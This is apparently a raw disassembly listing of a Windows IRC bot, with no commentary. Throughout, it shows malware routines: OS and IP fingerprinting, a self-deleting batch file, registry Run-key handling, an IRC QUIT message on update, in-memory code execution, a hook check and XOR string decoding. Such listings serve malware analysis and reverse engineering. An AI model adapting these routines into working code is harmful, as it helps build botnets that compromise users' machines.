cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset aVis ; "VIS"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418E9A: ; CODE XREF: sub_418E51+3B�j
cmp [ebp+74h+var_94], 5
jnz short loc_418EC6
cmp [ebp+74h+var_90], 2
jnz short loc_418EAD
push offset a2k3 ; "2K3"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EAD: ; CODE XREF: sub_418E51+53�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EBA
push offset aXp ; "XP"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EBA: ; CODE XREF: sub_418E51+60�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset a2k ; "2K"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EC6: ; CODE XREF: sub_418E51+4D�j
cmp [ebp+74h+var_94], 4
jnz short loc_418F05
cmp [ebp+74h+var_90], 5Ah
jnz short loc_418ED9
push offset aMe ; "ME"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418ED9: ; CODE XREF: sub_418E51+7F�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EE6
push offset a98 ; "98"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EE6: ; CODE XREF: sub_418E51+8C�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
cmp [ebp+74h+var_88], 2
jnz short loc_418EF8
push offset aNt ; "NT"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EF8: ; CODE XREF: sub_418E51+9E�j
cmp [ebp+74h+var_88], 1
jnz short loc_418F17
push offset a95 ; "95"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418F05: ; CODE XREF: sub_418E51+40�j
; sub_418E51+6C�j ...
push offset aUnk ; "UNK"
loc_418F0A: ; CODE XREF: sub_418E51+47�j
; sub_418E51+5A�j ...
lea eax, [ebx-1]
push eax ; Count
push esi ; Dest
call __snprintf
add esp, 0Ch
loc_418F17: ; CODE XREF: sub_418E51+AB�j
mov eax, esi
lea edx, [eax+1]
loc_418F1C: ; CODE XREF: sub_418E51+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418F1C
sub eax, edx
cmp [ebp+74h+arg_0], cl
mov [eax+esi], cl
jz loc_418FB3
push ebx ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
mov edi, eax
push edi ; void *
call __msize
push eax ; size_t
push 0 ; int
push edi ; void *
call _memset
add esp, 14h
push [ebp+74h+var_8C]
lea eax, [ebp+74h+var_84]
push [ebp+74h+var_90]
push [ebp+74h+var_94]
push eax
push esi
push offset aOsMicrosoftWin ; "[OS: Microsoft Windows %s %s (%i.%i bui"...
push edi ; void *
call __msize
pop ecx
dec eax
push eax ; Count
push edi ; Dest
call __snprintf
mov eax, edi
add esp, 20h
lea ecx, [eax+1]
loc_418F75: ; CODE XREF: sub_418E51+129�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418F75
push ebx ; size_t
sub eax, ecx
push 0 ; int
push esi ; void *
mov [eax+edi], dl
call _memset
push edi
push offset aS_13 ; "%s"
dec ebx
push ebx ; Count
push esi ; Dest
call __snprintf
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_418FA0: ; CODE XREF: sub_418E51+154�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418FA0
sub eax, ecx
push edi ; Memory
mov [eax+esi], dl
call j_j__free
pop ecx
loc_418FB3: ; CODE XREF: sub_418E51+DA�j
mov ecx, [ebp+74h+var_4]
pop edi
xor ecx, ebp
mov eax, esi
pop ebx
call sub_402710
add ebp, 74h
leave
retn
sub_418E51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418FC6 proc near ; CODE XREF: sub_401C1D+50�p
; sub_401CC0+FE�p ...
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push edi
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
xor eax, eax
mov edi, esi
stosd
stosd
stosd
stosd
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
mov [ebp+var_1C], 10h
call ds:dword_41D238 ; getsockname
movzx eax, [ebp+var_11]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_13]
push eax
movzx eax, [ebp+var_14]
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
push 0Fh ; Count
push esi ; Dest
call __snprintf
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_419029: ; CODE XREF: sub_418FC6+68�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_419029
sub eax, ecx
mov ecx, [ebp+var_8]
mov [eax+esi], dl
xor ecx, ebp
mov eax, esi
pop edi
call sub_402710
leave
retn
sub_418FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419044 proc near ; CODE XREF: sub_401F1C+10C�p
; sub_417676+A5�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
mov cl, [eax]
test cl, cl
push edi
jz short loc_4190AD
loc_419052: ; CODE XREF: sub_419044+24�j
mov dl, [esi]
cmp dl, 2Ah
jz short loc_41906A
cmp dl, cl
jz short loc_419062
cmp dl, 3Fh
jnz short loc_419088
loc_419062: ; CODE XREF: sub_419044+17�j
inc esi
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_419052
loc_41906A: ; CODE XREF: sub_419044+13�j
mov cl, [eax]
test cl, cl
jz short loc_4190AD
mov edi, [ebp+var_4]
loc_419073: ; CODE XREF: sub_419044+5F�j
mov dl, [esi]
cmp dl, 2Ah
jnz short loc_41908C
inc esi
cmp byte ptr [esi], 0
jz short loc_4190A7
mov [ebp+var_4], esi
lea edi, [eax+1]
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_419088: ; CODE XREF: sub_419044+1C�j
xor eax, eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_41908C: ; CODE XREF: sub_419044+34�j
cmp dl, cl
jz short loc_41909D
cmp dl, 3Fh
jz short loc_41909D
mov esi, [ebp+var_4]
mov eax, edi
inc edi
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_41909D: ; CODE XREF: sub_419044+4A�j
; sub_419044+4F�j
inc esi
inc eax
loc_41909F: ; CODE XREF: sub_419044+42�j
; sub_419044+57�j
mov cl, [eax]
test cl, cl
jnz short loc_419073
jmp short loc_4190AD
; ---------------------------------------------------------------------------
loc_4190A7: ; CODE XREF: sub_419044+3A�j
xor eax, eax
inc eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_4190AC: ; CODE XREF: sub_419044+6C�j
inc esi
loc_4190AD: ; CODE XREF: sub_419044+C�j
; sub_419044+2A�j ...
cmp byte ptr [esi], 2Ah
jz short loc_4190AC
xor eax, eax
cmp [esi], al
setz al
loc_4190B9: ; CODE XREF: sub_419044+46�j
; sub_419044+66�j
pop edi
pop esi
leave
retn
sub_419044 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4190BD proc near ; CODE XREF: sub_419477+14A�p
Dest = byte ptr -23Ch
var_23B = byte ptr -23Bh
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
Filename = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 23Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
push 37h ; size_t
lea eax, [ebp+var_3B]
push ebx ; int
push eax ; void *
mov [ebp+Filename], bl
call _memset
mov esi, 0FFh
push esi ; size_t
lea eax, [ebp+var_23B]
push ebx ; int
push eax ; void *
mov [ebp+Dest], bl
call _memset
push esi ; size_t
lea eax, [ebp+var_13B]
push ebx ; int
push eax ; void *
mov [ebp+var_13C], bl
call _memset
add esp, 24h
push 100h
lea eax, [ebp+var_13C]
push eax
push ebx
call ds:dword_41D0E4 ; GetModuleHandleA
push eax
call ds:dword_41D060 ; GetModuleFileNameA
lea eax, [ebp+var_13C]
push eax
push eax
lea eax, [ebp+Dest]
push offset a@echoOff1DelSI ; "@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
push eax ; Dest
call _sprintf
push 104h ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
push esi ; void *
call __msize
add esp, 18h
dec eax
push eax
push esi
call ds:dword_41D0F4 ; GetSystemDirectoryA
call _rand
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call _rand
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call _rand
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call _rand
push 0Ah
pop ecx
cdq
idiv ecx
lea eax, [ebp+Filename]
push edx
push esi
push offset aSTmpIIICCC_bat ; "%s\\tmp-%i%i%i-%c%c%c.bat"
push eax ; Dest
call _sprintf
push esi ; Memory
call j_j__free
lea eax, [ebp+Filename]
push offset Mode ; "w"
push eax ; Filename
call _fopen
mov esi, eax
add esp, 30h
cmp esi, ebx
jz short loc_41920B
lea eax, [ebp+Dest]
push eax
push offset aS_14 ; "%s"
push esi ; File
call _fprintf
push esi ; File
call _fclose
add esp, 10h
push ebx
push ebx
push ebx
lea eax, [ebp+Filename]
push eax
push ebx
push ebx
call ds:dword_41D1E4
loc_41920B: ; CODE XREF: sub_4190BD+122�j
mov ecx, [ebp+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4190BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419219(char *Format,char Args)
sub_419219 proc near ; CODE XREF: sub_41B925+199�p
; .text:0041BDC4�p
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
Dest = byte ptr -114h
var_113 = byte ptr -113h
var_8 = dword ptr -8
Format = dword ptr 8
Args = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
push edi
xor ebx, ebx
push 40h ; size_t
lea eax, [ebp+var_168]
push ebx ; int
push eax ; void *
mov [ebp+var_16C], ebx
call _memset
xor eax, eax
mov [ebp+var_124], ebx
lea edi, [ebp+var_120]
stosd
stosd
mov esi, 103h
push esi ; size_t
stosd
lea eax, [ebp+var_113]
push ebx ; int
push eax ; void *
mov [ebp+Dest], bl
call _memset
lea eax, [ebp+Args]
push eax ; Args
push [ebp+Format] ; Format
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __vsnprintf
add esp, 28h
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_16C]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
push ebx
lea eax, [ebp+Dest]
push eax
push ebx
call ds:dword_41D05C ; CreateProcessA
mov ecx, [ebp+var_8]
test eax, eax
pop edi
setnz al
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_419219 endp
; ---------------------------------------------------------------------------
push 0
call __time64
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_4192C7 proc near ; CODE XREF: sub_413A2D+81�p
; sub_413A2D+94�p ...
push esi
mov esi, eax
xor eax, eax
inc eax
sub eax, ebx
add esi, eax
cmp esi, 1
jg short loc_4192DA
mov eax, ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4192DA: ; CODE XREF: sub_4192C7+D�j
push 2
pop eax
cmp esi, eax
jle short loc_4192E7
loc_4192E1: ; CODE XREF: sub_4192C7+1E�j
add eax, eax
cmp eax, esi
jl short loc_4192E1
loc_4192E7: ; CODE XREF: sub_4192C7+18�j
push edi
lea edi, [eax-1]
loc_4192EB: ; CODE XREF: sub_4192C7+2D�j
call sub_418D5A
and eax, edi
cmp eax, esi
jge short loc_4192EB
pop edi
add eax, ebx
pop esi
retn
sub_4192C7 endp
; =============== S U B R O U T I N E =======================================
sub_4192FB proc near ; CODE XREF: sub_401F1C+420�p
; sub_413A2D:loc_413F5D�p ...
and dword_4265B0, 0
push 0 ; Time
mov dword_4265B4, 1Fh
call __time64
mov edx, 3FFFFFFFh
and eax, edx
pop ecx
mov dword_4265B8, eax
mov dword_4265BC, 1
mov eax, offset dword_4265B8
push esi
loc_419330: ; CODE XREF: sub_4192FB+48�j
lea ecx, [eax+4]
mov esi, [ecx]
add esi, [eax]
and esi, edx
mov [eax+8], esi
mov eax, ecx
cmp eax, offset dword_42668C
jl short loc_419330
pop esi
retn
sub_4192FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419347 proc near ; CODE XREF: sub_41748B+E6�p
; sub_41A5C1+B6�p ...
Dest = byte ptr -24h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push dword_4269BC
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+var_14]
stosb
call sub_418FC6
pop ecx
mov eax, esi
mov ecx, offset a192_168__ ; "192.168.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a10___ ; "10.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a111___ ; "111.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a15___ ; "15.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a16___ ; "16.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a101___ ; "101.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a110___ ; "110.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a112___ ; "112.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a170_65__ ; "170.65.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
push 10h
pop esi
loc_41941E: ; CODE XREF: sub_419347+11A�j
xor eax, eax
lea edi, [ebp+Dest]
stosd
stosd
stosd
push esi
push offset a172_D__ ; "172.%d.*.*"
stosd
lea eax, [ebp+Dest]
push 0Fh ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
add esp, 10h
lea edx, [eax+1]
loc_419441: ; CODE XREF: sub_419347+FF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419441
sub eax, edx
mov [ebp+eax+Dest], cl
lea eax, [ebp+var_14]
lea ecx, [ebp+Dest]
call sub_419044
test eax, eax
jnz short loc_419467
inc esi
cmp esi, 1Fh
jbe short loc_41941E
xor al, al
jmp short loc_419469
; ---------------------------------------------------------------------------
loc_419467: ; CODE XREF: sub_419347+3E�j
; sub_419347+52�j ...
mov al, 1
loc_419469: ; CODE XREF: sub_419347+11E�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419347 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419477 proc near ; CODE XREF: sub_41B925+1C5�p
; .text:0041C066�p
var_2A8 = byte ptr -2A8h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
Args = byte ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_28B = byte ptr -28Bh
var_1CC = byte ptr -1CCh
var_1CB = byte ptr -1CBh
var_CC = byte ptr -0CCh
var_CB = byte ptr -0CBh
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2A8h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 0BFh
xor ebx, ebx
push esi ; size_t
mov dword ptr [ebp+Args], eax
lea eax, [ebp+var_CB]
push ebx ; int
push eax ; void *
mov [ebp+var_CC], bl
call _memset
add esp, 0Ch
push esi ; size_t
lea eax, [ebp+var_28B]
push ebx ; int
push eax ; void *
mov [ebp+var_28C], bl
call _memset
add esp, 0Ch
push ebx
lea edi, [ebp+var_CC]
call sub_41B7F9
pop ecx
inc esi
push esi ; size_t
mov eax, edi
push ebx ; int
push eax ; void *
call _memset
add esp, 0Ch
push esi ; size_t
lea eax, [ebp+var_28C]
push ebx ; int
push eax ; void *
call _memset
add esp, 0Ch
push 0FFh ; size_t
lea eax, [ebp+var_1CB]
push ebx ; int
push eax ; void *
mov [ebp+var_1CC], bl
call _memset
mov eax, dword_433C4C
mov eax, [eax]
mov [ebp+var_290], eax
mov eax, offset dword_433C48
add esp, 0Ch
mov [ebp+var_294], eax
mov [ebp+var_2A0], eax
loc_419530: ; CODE XREF: sub_419477+102�j
mov eax, dword_433C4C
lea edi, [ebp+var_2A0]
lea esi, [ebp+var_294]
mov [ebp+var_29C], eax
call sub_40166F
test al, al
jz short loc_419587
mov edi, offset aRegistryMonito ; "Registry Monitor"
call sub_40164F
mov esi, eax
add esi, 5
push 11h
pop ecx
xor eax, eax
repe cmpsb
lea esi, [ebp+var_294]
jz short loc_41957B
lea edi, [ebp+var_2A8]
call sub_40168C
jmp short loc_419530
; ---------------------------------------------------------------------------
loc_41957B: ; CODE XREF: sub_419477+F5�j
call sub_40164F
mov eax, [eax]
call sub_414023
loc_419587: ; CODE XREF: sub_419477+D7�j
mov edi, 100h
push edi
lea esi, [ebp+var_1CC]
mov ebx, offset byte_425119
call sub_4196D1
pop ecx
mov eax, esi
push eax
push offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_416F32
add esp, 0Ch
push edi ; size_t
mov eax, esi
push 0 ; int
push eax ; void *
call _memset
add esp, 0Ch
call sub_4190BD
push dword ptr [ebp+Args] ; Args
mov edi, offset dword_4269BC
push offset aQuitSYouKilled ; "QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
call sub_4172CC
pop ecx
pop ecx
push 0
call ds:dword_41D050 ; ExitProcess
int 3 ; Trap to Debugger
jmp ds:dword_41D090
sub_419477 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195EC proc near ; CODE XREF: .text:loc_41BC29�p
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
call ds:dword_41D0CC ; GetCurrentProcess
mov esi, offset dword_420700
lea edi, [ebp+var_10]
movsd
movsd
push 40h
push 3000h
movsb
push 6
mov ebx, eax
xor edi, edi
push edi
lea eax, [ebp+var_18]
push ebx
mov [ebp+var_10+3], eax
call ds:dword_41D0C0 ; VirtualAllocEx
mov esi, eax
cmp esi, edi
jnz short loc_419635
loc_419631: ; CODE XREF: sub_4195EC+58�j
xor al, al
jmp short loc_419668
; ---------------------------------------------------------------------------
loc_419635: ; CODE XREF: sub_4195EC+43�j
push edi
push 40h
push 6
push esi
push ebx
call ds:dword_41D0C4 ; VirtualProtectEx
test eax, eax
jnz short loc_419631
mov eax, [ebp+var_10]
mov [esi], eax
mov eax, [ebp+var_C]
mov [esi+4], eax
call esi ; send
push 8000h
push edi
push esi
push ebx
call ds:dword_41D0C8 ; VirtualFreeEx
cmp [ebp+var_13], 0D0h
setnbe al
loc_419668: ; CODE XREF: sub_4195EC+47�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4195EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419677 proc near ; CODE XREF: .text:0041BC07�p
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push offset aMessageboxa_0 ; "MessageBoxA"
push offset aUser32_dll_0 ; "user32.dll"
mov [ebp+var_C], 55h
mov [ebp+var_B], 8Bh
mov [ebp+var_A], 0ECh
mov [ebp+var_9], 81h
mov [ebp+var_8], 0ECh
call ds:dword_41D0E8 ; LoadLibraryA
push eax
call ds:dword_41D0EC ; GetProcAddress
push 5
mov esi, eax
pop ecx
xor eax, eax
lea edi, [ebp+var_C]
repe cmpsb
mov ecx, [ebp+var_4]
setz al
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196D1 proc near ; CODE XREF: sub_40177B+81�p
; sub_4019F3+81�p ...
Count = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
push [ebp+arg_0] ; size_t
xor edi, edi
push edi ; int
push esi ; void *
call _memset
mov eax, ebx
add esp, 0Ch
lea ecx, [eax+1]
loc_4196EA: ; CODE XREF: sub_4196D1+1E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4196EA
sub eax, ecx
jz short loc_41975B
mov eax, [ebp+arg_0]
dec eax
mov [ebp+Count], eax
loc_4196FC: ; CODE XREF: sub_4196D1+88�j
mov eax, offset aHjdxzopvuvmrjf ; "hJdXZOPvUVmRJfVS"
lea edx, [eax+1]
loc_419704: ; CODE XREF: sub_4196D1+38�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419704
sub eax, edx
jz short loc_419711
xor eax, eax
loc_419711: ; CODE XREF: sub_4196D1+3C�j
movsx ecx, byte ptr [edi+ebx]
movsx eax, byte ptr aHjdxzopvuvmrjf[eax] ; "hJdXZOPvUVmRJfVS"
xor ecx, eax
xor ecx, 0FDh
push ecx
push esi
push offset aSC_0 ; "%s%c"
push [ebp+Count] ; Count
push esi ; Dest
call __snprintf
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41973C: ; CODE XREF: sub_4196D1+70�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41973C
sub eax, ecx
mov [eax+esi], dl
mov eax, ebx
inc edi
lea ecx, [eax+1]
loc_41974E: ; CODE XREF: sub_4196D1+82�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41974E
sub eax, ecx
cmp edi, eax
jb short loc_4196FC
loc_41975B: ; CODE XREF: sub_4196D1+22�j
mov eax, esi
pop edi
leave
retn
sub_4196D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419760 proc near ; CODE XREF: sub_419C1D+28�p
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 2Ch
push offset dword_4219D0
call __SEH_prolog4
mov edi, ds:dword_41D108
call edi ; GetTickCount
mov [ebp+var_20], eax
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
mov esi, ds:dword_41D028
call esi ; QueryServiceStatusEx
test eax, eax
jnz short loc_41979B
loc_419790: ; CODE XREF: sub_419760+61�j
; sub_419760+8A�j ...
call ds:dword_41D0F0 ; RtlGetLastWin32Error
jmp loc_41982F
; ---------------------------------------------------------------------------
loc_41979B: ; CODE XREF: sub_419760+2E�j
cmp [ebp+var_38], 1
jz loc_41982D
jmp short loc_4197D5
; ---------------------------------------------------------------------------
loc_4197A7: ; CODE XREF: sub_419760+79�j
push [ebp+var_24]
call ds:dword_41D0FC ; Sleep
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi ; QueryServiceStatusEx
test eax, eax
jz short loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi ; GetTickCount
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_4197D5: ; CODE XREF: sub_419760+45�j
cmp [ebp+var_38], 3
jz short loc_4197A7
lea eax, [ebp+var_3C]
push eax
push 1
push ebx
call ds:dword_41D01C ; ControlService
test eax, eax
jz short loc_419790
jmp short loc_419827
; ---------------------------------------------------------------------------
loc_4197EE: ; CODE XREF: sub_419760+73�j
; sub_419760+C5�j
mov eax, 5B4h
jmp short loc_41982F
; ---------------------------------------------------------------------------
loc_4197F5: ; CODE XREF: sub_419760+CB�j
push [ebp+var_24]
call ds:dword_41D0FC ; Sleep
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi ; QueryServiceStatusEx
test eax, eax
jz loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi ; GetTickCount
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_419827: ; CODE XREF: sub_419760+8C�j
cmp [ebp+var_38], 1
jnz short loc_4197F5
loc_41982D: ; CODE XREF: sub_419760+3F�j
; sub_419760+67�j ...
xor eax, eax
loc_41982F: ; CODE XREF: sub_419760+36�j
; sub_419760+93�j
call __SEH_epilog4
retn
sub_419760 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419835 proc near ; CODE XREF: sub_419EA0+2C7�p
; sub_419EA0+36E�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
push 10h
pop esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_4]
xor edi, edi
push edi
mov [ebp+var_8], esi
call ds:dword_41D034 ; LookupPrivilegeValueA
test eax, eax
jnz short loc_41985C
loc_419858: ; CODE XREF: sub_419835+5F�j
xor al, al
jmp short loc_4198CD
; ---------------------------------------------------------------------------
loc_41985C: ; CODE XREF: sub_419835+21�j
mov eax, [ebp+var_10]
mov [ebp+var_2C], eax
mov eax, [ebp+var_C]
mov [ebp+var_28], eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_20]
push eax
push esi
mov esi, ds:dword_41D014
lea eax, [ebp+var_30]
push eax
push edi
push [ebp+arg_0]
xor ebx, ebx
inc ebx
mov [ebp+var_30], ebx
mov [ebp+var_24], edi
call esi ; AdjustTokenPrivileges
mov edi, ds:dword_41D0F0
call edi ; RtlGetLastWin32Error
test eax, eax
jnz short loc_419858
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_20], ebx
jz short loc_4198B2
or [ebp+var_14], 2
jmp short loc_4198B6
; ---------------------------------------------------------------------------
loc_4198B2: ; CODE XREF: sub_419835+75�j
and [ebp+var_14], 0FFFFFFFDh
loc_4198B6: ; CODE XREF: sub_419835+7B�j
push eax
push eax
push [ebp+var_8]
lea ecx, [ebp+var_20]
push ecx
push eax
push [ebp+arg_0]
call esi ; AdjustTokenPrivileges
call edi ; RtlGetLastWin32Error
neg eax
sbb al, al
inc al
loc_4198CD: ; CODE XREF: sub_419835+25�j
pop edi
pop esi
pop ebx
leave
retn
sub_419835 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4198D2(int,int,int,void *Memory)
sub_4198D2 proc near ; CODE XREF: sub_419EA0+400�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Memory = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
xor ebx, ebx
push [ebp+Memory]
mov [ebp+var_8], ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_426570
test eax, eax
jnz short loc_419909
loc_4198F9: ; CODE XREF: sub_4198D2+70�j
; sub_4198D2+74�j
push [ebp+Memory] ; Memory
call j_j__free
pop ecx
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419909: ; CODE XREF: sub_4198D2+25�j
xor eax, eax
loc_41990B: ; CODE XREF: sub_4198D2+6C�j
and [ebp+var_4], 0
mov edx, offset dword_4255E8
loc_419914: ; CODE XREF: sub_4198D2+66�j
mov esi, [ebp+Memory]
mov ecx, [edx+80h]
add esi, eax
mov edi, edx
xor ebx, ebx
repe cmpsb
jz short loc_419944
mov ecx, 84h
add [ebp+var_4], ecx
add edx, ecx
cmp [ebp+var_4], 318h
jb short loc_419914
inc eax
cmp eax, [ebp+var_8]
jbe short loc_41990B
xor bl, bl
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_419944: ; CODE XREF: sub_4198D2+53�j
mov bl, 1
jmp short loc_4198F9
sub_4198D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
